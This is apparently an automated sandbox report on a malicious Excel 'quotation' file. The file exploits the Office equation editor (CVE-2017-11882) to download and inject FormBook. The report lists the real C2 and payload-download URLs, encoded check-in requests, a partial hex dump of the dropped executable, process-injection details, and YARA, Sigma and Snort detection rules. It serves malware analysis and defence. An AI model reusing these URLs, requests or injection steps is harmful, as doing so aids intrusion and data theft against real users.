Loading ...

Play interactive tourEdit tour

Windows Analysis Report (QUOTATION)B-RUS-20061REV2.xlsx

Overview

General Information

Sample Name:(QUOTATION)B-RUS-20061REV2.xlsx
Analysis ID:491355
MD5:ecd068fb962c5a9452a6f22c0725521c
SHA1:fdf1a902181584d47cb1aed7ac2ca333dcc62e5e
SHA256:3c3d0f13af1ccf38e72804d40b87dc215813ff6b36a20137d48c4a565c5a5c2e
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1928 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2792 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2796 cmdline: 'C:\Users\Public\vbc.exe' MD5: 50568FB6133EE4ED721EE46A3C0A9E98)
      • vbc.exe (PID: 2024 cmdline: C:\Users\Public\vbc.exe MD5: 50568FB6133EE4ED721EE46A3C0A9E98)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • autofmt.exe (PID: 2820 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: A475B7BB0CCCFD848AA26075E81D7888)
          • msiexec.exe (PID: 2308 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
            • cmd.exe (PID: 1124 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.odysseysailingsantorini.com/cmsr/"], "decoy": ["dahlia-dolls.com", "iamawife.com", "gardunomx.com", "roweelitetrucking.com", "asapvk.com", "strategieslimited.com", "healthyweathorganics.com", "wedding-gallery.net", "fastoffer.online", "biolab33.cloud", "los40delocta.com", "charliepaton.com", "jenpaddock.com", "zzmweb.com", "poetarts.com", "techwork4u.com", "tracylynpropp.com", "rkbodyfit.site", "migaleriapanama.com", "cosmostco.com", "johnsoncamping.com", "flowfinancialplanning.com", "xn--caamosdemexico-rnb.com", "plusqueindia.com", "wwwhyprr.com", "benimofis.com", "tandteutopia.com", "spaintravelvacation.com", "dear.services", "zhiwugongfang.com", "blogdavnc.com", "justicefundingexchange.com", "alphasecreweb.info", "xitechgroup.com", "kendalmountain.digital", "nieght.com", "pieter-janenmaaike.online", "myexclusiveshop.com", "love-potato.online", "mondebestglobal.com", "ranchlandconcierge.com", "southerngraphx.com", "pray4usa.info", "vilchesfinancial.com", "zelvio.store", "zenibusiness.com", "kindredhue.com", "californiatacosdinuba.com", "uncommonsolutionsllc.com", "easy-lah.com", "disciplesevents.com", "856380127.xyz", "zapzapgone.com", "paradisgrp.com", "programmerworks.info", "purchasesuite.com", "dorotajedrusik.com", "555999dy.com", "uvoyus.com", "utang.net", "elizabethhelma.com", "noseainsight.com", "simpleterior.com", "casatensina.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.466320044.00000000024B1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x183f9:$sqlite3step: 68 34 1C 7B E1
      • 0x1850c:$sqlite3step: 68 34 1C 7B E1
      • 0x18428:$sqlite3text: 68 38 2A 90 C5
      • 0x1854d:$sqlite3text: 68 38 2A 90 C5
      • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
      00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Click to see the 25 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.vbc.exe.25b91f4.3.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          5.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            5.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            5.2.vbc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
            • 0x175f9:$sqlite3step: 68 34 1C 7B E1
            • 0x1770c:$sqlite3step: 68 34 1C 7B E1
            • 0x17628:$sqlite3text: 68 38 2A 90 C5
            • 0x1774d:$sqlite3text: 68 38 2A 90 C5

            Sigma Overview

            Exploits:

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 180.214.239.85, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2792, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2792, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2792, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2796
            Sigma detected: Execution from Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2792, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2796

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.odysseysailingsantorini.com/cmsr/"], "decoy": ["dahlia-dolls.com", "iamawife.com", "gardunomx.com", "roweelitetrucking.com", "asapvk.com", "strategieslimited.com", "healthyweathorganics.com", "wedding-gallery.net", "fastoffer.online", "biolab33.cloud", "los40delocta.com", "charliepaton.com", "jenpaddock.com", "zzmweb.com", "poetarts.com", "techwork4u.com", "tracylynpropp.com", "rkbodyfit.site", "migaleriapanama.com", "cosmostco.com", "johnsoncamping.com", "flowfinancialplanning.com", "xn--caamosdemexico-rnb.com", "plusqueindia.com", "wwwhyprr.com", "benimofis.com", "tandteutopia.com", "spaintravelvacation.com", "dear.services", "zhiwugongfang.com", "blogdavnc.com", "justicefundingexchange.com", "alphasecreweb.info", "xitechgroup.com", "kendalmountain.digital", "nieght.com", "pieter-janenmaaike.online", "myexclusiveshop.com", "love-potato.online", "mondebestglobal.com", "ranchlandconcierge.com", "southerngraphx.com", "pray4usa.info", "vilchesfinancial.com", "zelvio.store", "zenibusiness.com", "kindredhue.com", "californiatacosdinuba.com", "uncommonsolutionsllc.com", "easy-lah.com", "disciplesevents.com", "856380127.xyz", "zapzapgone.com", "paradisgrp.com", "programmerworks.info", "purchasesuite.com", "dorotajedrusik.com", "555999dy.com", "uvoyus.com", "utang.net", "elizabethhelma.com", "noseainsight.com", "simpleterior.com", "casatensina.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: (QUOTATION)B-RUS-20061REV2.xlsxReversingLabs: Detection: 28%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
            Antivirus detection for URL or domainShow sources
            Source: http://180.214.239.85/service/rundll32.exeAvira URL Cloud: Label: malware
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exeReversingLabs: Detection: 13%
            Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 13%
            Source: 5.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.507251158.00000000007CA000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, msiexec.exe
            Source: global trafficDNS query: name: www.paradisgrp.com
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx5_2_00407AFA
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi5_2_00417D59
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 180.214.239.85:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 180.214.239.85:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2022566 ET TROJAN Possible Malicious Macro EXE DL AlphaNumL 192.168.2.22:49165 -> 180.214.239.85:80
            Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 180.214.239.85:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 128.65.195.232:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 128.65.195.232:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 128.65.195.232:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.paradisgrp.com
            Source: C:\Windows\explorer.exeNetwork Connect: 128.65.195.232 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.uvoyus.com
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.odysseysailingsantorini.com/cmsr/
            Source: Joe Sandbox ViewASN Name: INFOMANIAK-ASCH INFOMANIAK-ASCH
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
            Source: global trafficHTTP traffic detected: GET /cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA== HTTP/1.1Host: www.paradisgrp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp HTTP/1.1Host: www.uvoyus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Sep 2021 12:04:10 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Mon, 27 Sep 2021 09:26:10 GMTETag: "a7600-5ccf6b00272b4"Accept-Ranges: bytesContent-Length: 685568Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cf 8d 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6a 0a 00 00 0a 00 00 00 00 00 00 ee 88 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c 88 0a 00 4f 00 00 00 00 a0 0a 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 69 0a 00 00 20 00 00 00 6a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 06 00 00 00 a0 0a 00 00 08 00 00 00 6c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 74 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 88 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 dc 43 02 00 f0 f2 00 00 03 00 00 00 01 01 00 06 cc 36 03 00 d0 51 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 02 03 7d 01 00 00 04 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 07 00 00 04 2a 1e 02 7b 07 00 00 04 2a 22 02 03 7d 08 00 00 04 2a 1e 02 7b 08 00 00 04 2a 22 02 03 7d 09 00 00 04 2a 1e 02 7b 09 00 00 04 2a 22 02 03 7d 0a 00 00 04 2a 1e 02 7b 0a 00 00 04 2a 22 02 03 7d 0b 00 00 04 2a 1e 02 7b 0b 00 00 04 2a 22 02 03 7d 0c 00 00 04 2a 1e 02 7b 0c 00 00 04 2a 22 02 03 7d 0d 00 00 04 2a 1e 02 7b 0d 00 00 04 2a 22 02 03 7d 0e 00 00 04 2a 1e 02 7b 0e 00 00 04 2a 22 02 03 7d 0f 00 00 04 2a 1e 02 7b 0f 00 00 04 2a 22 02 03 7d 10 00 00 04 2a 1e 02 7b 10 00 00 04 2a 13 30 02 00 71 00 00 00 00 00 00 00 02 28 17 00 00 0a 00 00 02 16 28 1
            Source: global trafficHTTP traffic detected: GET /service/rundll32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.85Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 12:05:31 GMTServer: ApacheVary: accept-language,accept-charsetUpgrade: h2Connection: Upgrade, closeAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 31 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6d 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 